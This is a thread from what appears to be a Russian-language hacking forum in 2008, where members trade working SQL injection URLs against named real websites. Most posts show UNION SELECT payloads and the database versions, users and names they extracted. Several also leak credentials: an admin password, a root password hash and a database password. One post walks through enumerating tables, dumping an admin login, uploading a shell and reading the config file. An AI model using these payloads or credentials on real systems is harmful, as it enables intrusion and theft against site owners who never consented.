15.09.2008, 14:46
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами:
9587456
Репутация:
120
|
|
http://www.ciritas.ru/product.php?id=-15+union+select+1,2,3,4,5,67,8,/*
user:ciritas5_website@localhost
version:4.1.22-log
database:ciritas5_ciritas
|
|
|
15.09.2008, 19:45
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
culturagay ROFL 
Код:
http://www.culturagay.it/cg/schedaLibro.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
4.0.27-standard-log:Sql10342_1:Sql10342@62.149.130.18
|
|
|
|
15.09.2008, 23:57
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
С нами:
10039659
Репутация:
209
|
|
Код:
http://moritzlaw.osu.edu/electionlaw/maps/maps.php?ID=69+union+select+1,2,user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
user() - barlow2@www5.it.ohio-state.edu
database() - moritzdb2
version() - 5.0.27 |
|
|
|
16.09.2008, 02:40
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
Код:
http://www.cairngorms.co.uk/park/visitors/eventsdiary/maps.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4%20LIMIT%201,1/*
4.1.22-log:cnpa_cairngorms:cnpa_dbuser@localhost
|
|
|
|
16.09.2008, 03:45
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
http://priluki.info/cgi-bin/foto.cgi?showgallery=-1+union+select+1,concat_ws(0x3a3a,name,pass,user), 3,4,5,6,7+from+users+limit+0,1
login:OLEX
pass:12321
Хохляцкий портал города Прилуки....
|
|
|
|
16.09.2008, 16:58
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
http://www.fuckmachines.de/index.php?page=kategorie&catId=-1+union+select+1,2,concat_ws(0x3a3a,password)+from +admin_user+limit+0,1/*
http://www.fuckmachines.de/admin
не брутится...
|
|
|
|
16.09.2008, 20:59
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
Код:
http://www.hook.tv/groups.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3%20LIMIT%201,1/*
4.1.22-standard:hook00_hookmstr:hook00_user@localhost
|
|
|
|
16.09.2008, 22:00
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами:
9483229
Репутация:
1160
|
|
http://www.obereg.ru/zagorod.html?id=1537+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*
Version():4.1.11-standard
User()  bereg@localhost
-----
http://sao.mos.ru/?r=9_doc&cat=1+union+select+1,unhex(hex(version()) ),3
version:4.1.12
user:sao1@chicken
------
http://advertising.koeln-bonn-airport.de/index.php?id=-4+union+select+concat_ws(0x3a,user,password),2+fro m+mysql.user/*
Вывод в титле:
root:32a6457455517e7f
есть доступ в mysql.user
Последний раз редактировалось DDoSька; 17.09.2008 в 05:06..
|
|
|
|
17.09.2008, 08:04
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами:
9420866
Репутация:
228
|
|
грузинский сайт:
http://www.geoimport.ge
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(version(),user(),database()),15,16,17,18,19,20,21,22,23--
version() - 5.0.51
user() - geoimport_ge@localhost
database() - geoimport_ge
Версия > 5 => есть information_schema:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+1,1--
Перебираем лимитом. Видим интересную таблицу:
c_config. Рассматриваем ее тоже лимитом:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x635f636f6e666967+limit+1,1--
Ничего интересного, идем далее.
Приступаем к ее изучению:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x635f6d656d62657273+limit+1,1--
Сразу же находим username. Записываем в память 
Нашел таблицу c_members, но та бесполезная...
Находим еще кое что интересное: c_users...
Идем далее...
Находим login и password...
Выводим:
Код:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(login,0x3a,password),15,16,17,18,19,20,21,22,23+from+c_users--
Result:
admin:geoneo2008
Ну в админке там ваше шелл лить - нет проблем)))
С помощью шелла узнал в конфиге ето:
server: localhost
db_username (and db_name): geoimport_ge
db_pass: x3f5h6a54sdg
Последний раз редактировалось USAkid; 17.09.2008 в 08:20..
|
|
|
|
17.09.2008, 14:22
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
http://www.edinburghfolkclub.org.uk/giginfo.php?gigID=182UNION+SELECT+1,2,3,4,5,6,7,8, 9,10,11,12,13/*
Dbname: amayze2
Version: 5.0.27-standard-log
Username: amayze2@linweb6.atlas.pipex.net
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
